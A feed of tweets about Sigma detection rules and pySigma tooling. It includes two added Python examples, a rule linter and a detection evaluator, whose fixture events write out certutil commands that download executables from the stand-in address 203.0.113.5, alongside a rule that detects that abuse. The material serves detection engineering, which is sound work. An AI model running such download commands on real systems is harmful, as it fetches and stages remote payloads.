Hi, pySigma 0.11.5 is out 🥳 Release is github.com/SigmaHQ/pySigm…, lots of new features. Now you can use case-sensitive regex like the very old sigmac 👻; here is my pipeline github.com/frack113/pySig… It's going to be hard to find arguments to stay with sigmac in production. ☺️
New blog release @sigma_hq by @MosiMoradian How to Validate Sigma Rules with GitHub Actions for Improved Security Monitoring - blog.sigmahq.io/how-to-validat… Check it out to learn all about this collab between @sigma_hq and @grafana that resulted in a new JSON schema and a GitHub…
There is now a Sigma rule validator on the GitHub marketplace, written by @MosiMoradian. It helps you ensure that the rules you deploy to your repo can be converted using the official "pySigma" converter github.com/marketplace/ac…
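As an added illustration of the kind of structural checks a rule has to pass before a converter can do anything with it, here is a minimal Sigma rule lint written for this page. It is not the marketplace action and not pySigma's own validation (the action converts the rule with pySigma, which catches far more); the two rules it runs over are constructed for the example, the placeholder id is the nil UUID, and the modifier list and the tag pattern are assumptions drawn from the Sigma specification and SigmaHQ tagging conventions. The rule is embedded as the dict that yaml.safe_load() would return for the YAML file, so PyYAML is not needed to run it.

```python
"""Structural lint for a Sigma rule (added example; not the SigmaHQ GitHub action
and not pySigma's validators). Rules are the dicts yaml.safe_load() returns."""
import fnmatch
import re
import uuid

REQUIRED_KEYS = ("title", "logsource", "detection")  # required by the Sigma spec
# Value modifiers from the Sigma spec (assumed sufficient for this lint; extend as needed).
KNOWN_MODIFIERS = {"contains", "startswith", "endswith", "all", "re", "base64",
                   "base64offset", "utf16le", "utf16be", "wide", "windash", "cidr",
                   "lt", "lte", "gt", "gte", "exists"}
CONDITION_KEYWORDS = {"and", "or", "not", "of", "them", "all"}


def _fields_of(search):
    """Field specs ('Name|mod|mod') used by one detection entry (map or list of maps)."""
    if isinstance(search, dict):
        return list(search)
    if isinstance(search, list):
        return [f for item in search if isinstance(item, dict) for f in item]
    return []


def _defined(ref, identifiers):
    """True if a condition token ('selection', 'selection_*', 'them') resolves to identifiers."""
    if ref == "them":
        return bool(identifiers)
    if "*" in ref:
        return bool(fnmatch.filter(identifiers, ref))
    return ref in identifiers


def lint_rule(rule):
    """Return a list of problems; an empty list means the rule passed every check."""
    problems = [f"missing required key: {k}" for k in REQUIRED_KEYS if k not in rule]
    if "id" in rule:
        try:
            uuid.UUID(str(rule["id"]))
        except ValueError:
            problems.append("id is not a UUID")
    logsource = rule.get("logsource")
    if not isinstance(logsource, dict) or not {"category", "product", "service"} & set(logsource):
        problems.append("logsource needs at least one of category/product/service")
    detection = rule.get("detection")
    detection = detection if isinstance(detection, dict) else {}
    identifiers = {k for k in detection if k != "condition"}
    if not identifiers:
        problems.append("detection defines no search identifiers")
    if "condition" not in detection:
        problems.append("detection.condition is missing")
    # Every identifier the condition names (including 'selection_*' patterns) must exist.
    for tok in re.findall(r"[A-Za-z0-9_*]+", str(detection.get("condition", ""))):
        if tok not in CONDITION_KEYWORDS and not tok.isdigit() and not _defined(tok, identifiers):
            problems.append(f"condition references undefined identifier: {tok}")
    for ident in sorted(identifiers):
        for spec in _fields_of(detection[ident]):
            name, *mods = spec.split("|")
            problems += [f"{ident}: unknown modifier '{m}' on field {name}"
                         for m in mods if m not in KNOWN_MODIFIERS]
    # SigmaHQ tags are lowercase namespace.value, e.g. attack.t1105 or attack.command_and_control.
    for tag in rule.get("tags", []):
        if not re.fullmatch(r"[a-z0-9][a-z0-9._-]*\.[a-z0-9_-]+", str(tag)):
            problems.append(f"tag is not lowercase namespace.value: {tag}")
    return problems


# Constructed rules for the demonstration (not from the SigmaHQ repository).
GOOD_RULE = {
    "title": "Certutil Download From URL",
    "id": "00000000-0000-0000-0000-000000000000",  # placeholder: the nil UUID
    "status": "test",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {"Image|endswith": "\\certutil.exe",
                      "CommandLine|contains|all": ["-urlcache", "http"]},
        "filter_system": {"User|startswith": "NT AUTHORITY\\"},
        "condition": "selection and not filter_system",
    },
    "level": "medium",
    "tags": ["attack.command_and_control", "attack.t1105"],
}
BAD_RULE = {
    "title": "Broken Rule",
    "id": "not-a-uuid",
    "detection": {"selection": {"CommandLine|conatins": "-urlcache"},
                  "condition": "selection and not filter_system"},
    "tags": ["Attack.T1105"],
}
```

lint_rule(GOOD_RULE) returns an empty list; lint_rule(BAD_RULE) reports the missing logsource, the malformed id, the typo in the modifier, the undefined filter_system identifier and the mixed-case tag, which is exactly the class of mistake that would otherwise only surface when the converter fails in CI.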
⭐️This is such a rich resource --sigmahq.streamlit.app Developing in Sigma? Worth checking this out!
We recently launched a dedicated Sigma discord server. If you wanna discuss anything related to sigma and its tool chain (pysigma) you're more than welcome. discord.gg/kQQBn5W2z5
2023 has been a very busy year for the @sigma_hq team and a great year for the Sigma community at large. We've seen a greater adoption of Sigma across all of the community and even from big vendors ranging from Qradar native support for Sigma rules, Splunk leveraging Sigma for…
🪄The final #SigmaHQ r2023-12-21 release for this year is upon us. 🌟21 New Rules 🛡️55 Rule updates 🔬 30 Rule Fixes This release focused a lot on tuning and updating older rules. But we couldn't not finish the year without including a couple of interesting detections. - New…
Love the work that the impede guys are doing. The new update looks slick and the addition of @sigma_hq rules is much appreciated. Allowing users to leverage all the amazing community work from @sigma_hq and @TheDFIRReport in this first version/batch is a great step. Avoiding…
Linux & macOS binaries? Covered! Our newest hunting feature allows matching Sigma rules against Linux and macOS samples, check our new post by @Joseliyo_Jstnk, including pro tips for crafting livehunt Yara rules based on Sigma: blog.virustotal.com/2023/12/sigma-…
Mastering Sigma: The Future of Security Content | Atomics on a Friday x.com/i/broadcasts/1…
🧙♂️#SigmaHQ r2023-11-20 Release is here. 🌟29 New Rules 🛡️44 Rule updates 🔬 11 Rule Fixes This release includes new rules for Lace Tempest exploitation of SysAid, coverage for CVE-2023-22518 and CVE-2023-46747 potential exploitation attempts, usage of the ActivateMicrosoftApp…
SigmAIQ: pySigma Wrapper & Utils by @AttackIQ This sounds amazing github.com/AttackIQ/SigmA…
Beyond One-Size-Fits-All: Sigma’s Approach to Taxonomies blog.sigmahq.io/why-does-sigma…
.@m3nixx and I took some time this weekend to cook something cool for Sigconverter sigconverter.io 🧑🍳 You can now apply custom pySigma processing pipelines directly on the website. You might ask what does this mean? Custom processing pipelines allows you to transform a…
The sigconverter.io website just got a sweet usability update thanks to @m3nixx 🚀 You can now bookmark your backend and pipeline configuration as well as share your rules all thanks to new URL params. 🌟 By clicking on the share icon (highlighted in the screenshot…
🧙♂️#SigmaHQ r2023-11-06 Release is here. 🌟27 New Rules 🛡️40 Rule updates 🔬9 Rule Fixes This release includes new rules related to the recently reported Diamond Sleet APT by Microsoft, a couple of Okta-related rules based on BeyondTrust reporting as well as rules covering the…
🧙♂️Introducing SigmaHQ GUI 🧙♂️ This tool was built specifically to easily create and update Sigma Security Content. Get started now and start exploring and creating rules -> sigmahq.streamlit.app Read more about the tool in this release blog -> blog.sigmahq.io/introducing-si… ⚒️…
I heard you liked the new Sigma sigmahq.io? Well, get ready for more 🧙♂️ Coming in the next few weeks, a built-in Sigma rule viewer where you can easily inspect, share and "admire" all the Sigma rules 🚀
🚀 #SigmaHQ r2023-10-23 Release is here. 🚀 🌟21 New Rules 🛡️17 Rule updates 🔬24 Rule Fixes Ranging from generic detections covering Curl and CertOC abuse to Emerging Threats related to CVE-2023-27363 & CVE-2023-43261 and much more 🧙♂️ Read the release highlight blog ->…
And if you can ingest it into #SecurityOnion, you can write a @sigma_hq detection using Playbook. badda bing badda boom
Periodic reminder that @securityonion can ingest logs from many different cloud sources, if you need visibility into that part of your architecture and would rather not go blind from reading JSON straight out of an S3 bucket.
Elasticsearch keyword searches are fast and fine but miss case-insensitive searches. Event Query Language (EQL) sounds like a valuable answer for many security-related use cases. Today I'm allowed to release pySigma-backend-elasticsearch (v1.0.8) with EQL support. @sigma_hq
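To make the case-sensitivity point concrete, here is an added example (not pySigma, not the Elasticsearch backend, not EQL) that implements the value semantics the Sigma specification gives a rule's detection section in plain Python and runs a constructed detection over constructed events. Plain values are case-insensitive with * and ? wildcards, contains/startswith/endswith/all/re are honoured, a map ANDs its fields, a list ORs its items, and the condition grammar covers and/or/not, parentheses and "N of X" / "all of them". The exact_term_matches function stands in for an un-normalised, case-sensitive term lookup and is deliberately not Sigma-conformant, so you can see what it misses. Assumptions: the |re modifier is applied unanchored, as written; events are dicts of already-parsed fields; the event values are invented.

```python
"""Sigma detection semantics in plain Python (added example; not pySigma or any backend).
Plain values: case-insensitive, * and ? wildcards. Modifiers: contains/startswith/endswith/
all/re. Assumption: |re is applied unanchored, as written. Events: dicts of parsed fields."""
import fnmatch
import re

def _matcher(value, mods):
    """Compile one Sigma value plus its modifiers into a predicate over a string."""
    if "re" in mods:  # regex used verbatim: case-sensitive unless the pattern says otherwise
        rx = re.compile(str(value))
        return lambda s: rx.search(s) is not None
    wrap = {"contains": "*{}*", "startswith": "{}*", "endswith": "*{}"}
    v = next((t.format(value) for m, t in wrap.items() if m in mods), str(value))
    # fnmatch.translate maps * and ? to regex and escapes the rest; IGNORECASE gives
    # the spec's case-insensitive matching for plain values.
    rx = re.compile(fnmatch.translate(v), re.IGNORECASE)
    return lambda s: rx.match(s) is not None

def field_matches(event, field_spec, values):
    name, *mods = field_spec.split("|")
    values = values if isinstance(values, list) else [values]
    actual = event.get(name)
    if actual is None:  # null only matches a null/missing field
        return None in values
    results = [_matcher(v, mods)(str(actual)) for v in values if v is not None]
    return all(results) if "all" in mods else any(results)

def search_matches(event, search):
    """Map: all fields must match. List: any item. Bare string: keyword over all values."""
    if isinstance(search, dict):
        return all(field_matches(event, f, v) for f, v in search.items())
    if isinstance(search, list):
        return any(search_matches(event, item) for item in search)
    kw = _matcher(search, ["contains"])
    return any(kw(str(v)) for v in event.values())

def evaluate(detection, event):
    """Evaluate the condition with precedence not > and > or (recursive descent)."""
    ids = {k: search_matches(event, v) for k, v in detection.items() if k != "condition"}
    toks = re.findall(r"\(|\)|[\w*]+", detection["condition"])
    pos = 0
    def take():
        nonlocal pos
        pos += 1
        return toks[pos - 1]
    def factor():
        tok = take()
        if tok == "not":
            return not factor()
        if tok == "(":
            v = expr()
            if take() != ")":
                raise ValueError("unbalanced parenthesis in condition")
            return v
        if tok == "all" or tok.isdigit():  # "all of them", "1 of selection_*"
            if take() != "of":
                raise ValueError("expected 'of' after quantifier")
            pat = take()
            members = list(ids) if pat == "them" else fnmatch.filter(ids, pat)
            hits = sum(ids[m] for m in members)
            return hits == len(members) if tok == "all" else hits >= int(tok)
        return ids[tok]  # KeyError means the condition names an undefined identifier
    def term():
        v = factor()
        while pos < len(toks) and toks[pos] == "and":
            take()
            v = factor() and v
        return v
    def expr():
        v = term()
        while pos < len(toks) and toks[pos] == "or":
            take()
            v = term() or v
        return v
    return expr()

def run(detection, events):
    """Indices of the events the detection fires on."""
    return [i for i, e in enumerate(events) if evaluate(detection, e)]

def exact_term_matches(event, search):
    """Stand-in for a case-sensitive exact term lookup; deliberately not Sigma-conformant."""
    return all(str(event.get(f)) == str(v) for f, v in search.items())

# Constructed detection and events for the demonstration (not real telemetry).
DETECTION = {
    "selection": {"Image|endswith": "\\certutil.exe",
                  "CommandLine|contains|all": ["-urlcache", "http"]},
    "filter_system": {"User|startswith": "NT AUTHORITY\\"},
    "condition": "selection and not filter_system",
}
EVENTS = [
    {"Image": "C:\\Windows\\System32\\CERTUTIL.EXE", "User": "CORP\\jdoe",
     "CommandLine": "CERTUTIL.EXE -URLCache -split -f http://203.0.113.5/a.exe a.exe"},
    {"Image": "C:\\Windows\\System32\\certutil.exe", "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": "certutil -urlcache -f http://203.0.113.5/b.exe b.exe"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "User": "CORP\\jdoe", "CommandLine": "cmd /c whoami"},
]
```

run(DETECTION, EVENTS) fires only on the first event: the upper-cased CERTUTIL.EXE and -URLCache still match under Sigma's case-insensitive semantics, while the second event is removed by the filter and the third never matches. An exact term lookup for "C:\Windows\System32\certutil.exe" against that first event returns False, which is the miss the tweet is warning about; note that the |re modifier keeps the regex's own case-sensitivity, so a rule author who switches to a regex has to handle case explicitly.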
Finally got my pySigma backend for PowerShell to successfully complete all of its GitHub workflows! Now that it has some credibility, I can test it against the @sigma_hq rule repository github.com/cyberphor/pySi…
Part 2 of our deep dive into the #infostealer landscape is out now, summarizing 10 of the @MITREattack techniques most commonly associated with a wide range of today's top stealers & giving practical defensive guidance aligned with each one
#Infostealers are one of our top threats for 2023 as operators increasingly move toward targeting enterprise organizations. Wondering how to defend your company? Check out our latest blog for defenses against specific TTPs! #cybersecurity hubs.la/Q01zZmPx0
Limited on-disk #detection opportunities as many families focus on evasion, but we still note a couple @sigma_hq analytics for top infostealer procedures & variations. Lots of mitigations covered, & we even pushed a new @redcanary Atomic test for a recent stealer Discovery #TTP
Uploaded our presentation for the SANS CTI Summit to our GitHub. github.com/blackberry/thr… The Sigma rules created during the research were merged into the official @sigma_hq repo :) #CTISummit
@jorgeorchilles @ali_alwashali @sigma_hq @nas_bench More like a band-aid than a nice fix, but it's a workaround for now 🤷♂️ x.com/securepeacock/…
Today I learned about: github.dev/SigmaHQ/sigma
@ali_alwashali @sigma_hq @nas_bench @SecurePeacock had a nice fix he tweeted out.
If you write a @sigma_hq rule using the "category: ps_script" know that it's mapped to both logs ;)
Remember to check the @sigma_hq specs repository for information about available log sources, allowed tags, and fields. If there's an interesting log source missing please open an issue and we'll add it :) github.com/SigmaHQ/sigma-…
Today I started digging into the Microsoft-Windows-LSA channel. I made a first rule. But you can only use it if you didn't give admin rights to anybody. 😇 github.com/SigmaHQ/sigma/… If you find more stuff, make a pull request. You are always welcome on @sigma_hq
Fun fact. You can use the free version of Aurora (nextron-systems.com/aurora/) to benefit from all the linked SIGMA rules at the end of each @TheDFIRReport for FREE. If you couple that with the dashboard feature (see here x.com/cyb3rops/statu…) You'll get live alerts.
Unwrapping Ursnifs Gifts ➡️Initial Access: Ursnif ISO/LNK/DLL ➡️Discovery: Get-ADComputer, nltest, net view, etc. ➡️Credentials: LSASS access ➡️Lateral: Impacket ➡️Persistence: Registry Run Key ➡️C2: Ursnif, Cobalt Strike thedfirreport.com/2023/01/09/unw… 1/X
Now you can have galaxies related to @sigma_hq in your MISP. In the next days I'll update the script since I've added the relationship with @MITREattack :) If you want to get more info about this script and the motivation: jstnk9.github.io/jstnk9/blog/Si… Thank you @adulau and @MISPProject 💙
A huge thanks to @Joseliyo_Jstnk for the work on converting @sigma_hq rules automatically into a @MISPProject galaxy. I finally found the time to merge it into the default galaxies. The MISP galaxy will be updated at each release automatically. #threatintel github.com/jstnk9/MISP/pu…
Just learned about the Open Source Security Index, tracking the most popular and fastest growing open source security projects on GitHub. opensourcesecurityindex.io ⚛️ Great to see Atomic Red Team hovering near the top, and in some predictably great company (@sigma_hq at #5).
I've developed a script to create @MISPProject galaxies from @sigma_hq rules. In the past I did something similar but with taxonomies. Contextual information was lost in that way. Full blog with explanation: jstnk9.github.io/jstnk9/blog/Si… Galaxies & script: github.com/jstnk9/MISP/tr… 🧵
Just wrote an article about how easy (and fun) it is to get involved with real-world #threatdetection using Atomic Red Team, @MITREattack, and @sigma_hq. Let me know what you think! link.medium.com/lb0ppknbIvb